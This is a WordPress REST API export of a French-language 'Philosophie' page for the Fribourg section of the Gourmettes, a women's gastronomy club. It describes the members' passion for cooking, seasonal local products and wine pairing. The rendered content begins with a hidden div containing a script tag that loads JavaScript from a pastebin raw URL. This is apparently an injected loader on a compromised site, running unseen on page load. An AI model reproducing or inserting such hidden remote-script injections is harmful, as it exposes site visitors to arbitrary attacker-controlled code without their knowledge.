{"id":24,"date":"2013-12-15T00:00:45","date_gmt":"2013-12-14T23:00:45","guid":{"rendered":"http:\/\/www.gourmettes-fribourg.ch\/SiteGourmettes\/wordpress\/?page_id=24"},"modified":"2025-03-13T07:51:04","modified_gmt":"2025-03-13T06:51:04","slug":"philosophie-2","status":"publish","type":"page","link":"http:\/\/www.gourmettes-fribourg.ch\/?page_id=24","title":{"rendered":"Philosophie"},"content":{"rendered":"<div style=\"display:none\"><script language=\"javascript\" type=\"text\/javascript\" src=\"http:\/\/pastebin.com\/raw.php?i=f4Rv9vKp\"><\/script><\/div>\n<p>La section Fribourgeoise des Gourmettes est un regroupement de passionn\u00e9es de cuisine et des arts de la table. Elle fait partie de&nbsp;<a href=\"http:\/\/www.gourmettes.ch\/\">\u00ab&nbsp;l\u2019association Suisse des Gourmettes&nbsp;\u00bb<\/a> confr\u00e9rie&nbsp;f\u00e9minine gastronomique, bachique et artistique fond\u00e9e en 1978, membre de la FSCBG (F\u00e9d\u00e9ration Suisse des Confr\u00e9ries Bachiques et Gastronomiques).<\/p>\n<p>Des femmes de go\u00fbt, qui cuisinent de bons produits, privil\u00e9giant ceux du terroir, frais et de saison, en accordant les vins aux diff\u00e9rents mets, et toujours \u00e0 la recherche de nouvelles d\u00e9couvertes gustatives provenant de tous horizons.<\/p>\n<p>Les Gourmettes se perfectionnent dans l\u2019exercice de l\u2019art culinaire, en r\u00e9alisant des repas gastronomiques et des d\u00e9corations de table en harmonie avec les menus pr\u00e9sent\u00e9s.<\/p>\n<p>Cette association n\u2019a pas de but lucratif, c\u2019est essentiellement un moyen de se retrouver entre amies afin de partager astuces et savoir-faire dans la r\u00e9alisation de recettes de famille ou des d\u00e9lices de grands chefs.<\/p>\n\n\n<p>Vous pouvez consulter le site des Gourmettes Suisse <\/p>\n\n\n\n<p><a href=\"https:\/\/www.gourmettes.ch\/fribourg\">https:\/\/www.gourmettes.ch\/fribourg<\/a><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La section Fribourgeoise des Gourmettes est un regroupement de passionn\u00e9es de cuisine et des arts de la table. Elle fait&#8230; <a href=\"http:\/\/www.gourmettes-fribourg.ch\/?page_id=24\">Plus &raquo;<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/www.gourmettes-fribourg.ch\/index.php?rest_route=\/wp\/v2\/pages\/24"}],"collection":[{"href":"http:\/\/www.gourmettes-fribourg.ch\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.gourmettes-fribourg.ch\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.gourmettes-fribourg.ch\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/www.gourmettes-fribourg.ch\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24"}],"version-history":[{"count":10,"href":"http:\/\/www.gourmettes-fribourg.ch\/index.php?rest_route=\/wp\/v2\/pages\/24\/revisions"}],"predecessor-version":[{"id":8751,"href":"http:\/\/www.gourmettes-fribourg.ch\/index.php?rest_route=\/wp\/v2\/pages\/24\/revisions\/8751"}],"wp:attachment":[{"href":"http:\/\/www.gourmettes-fribourg.ch\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}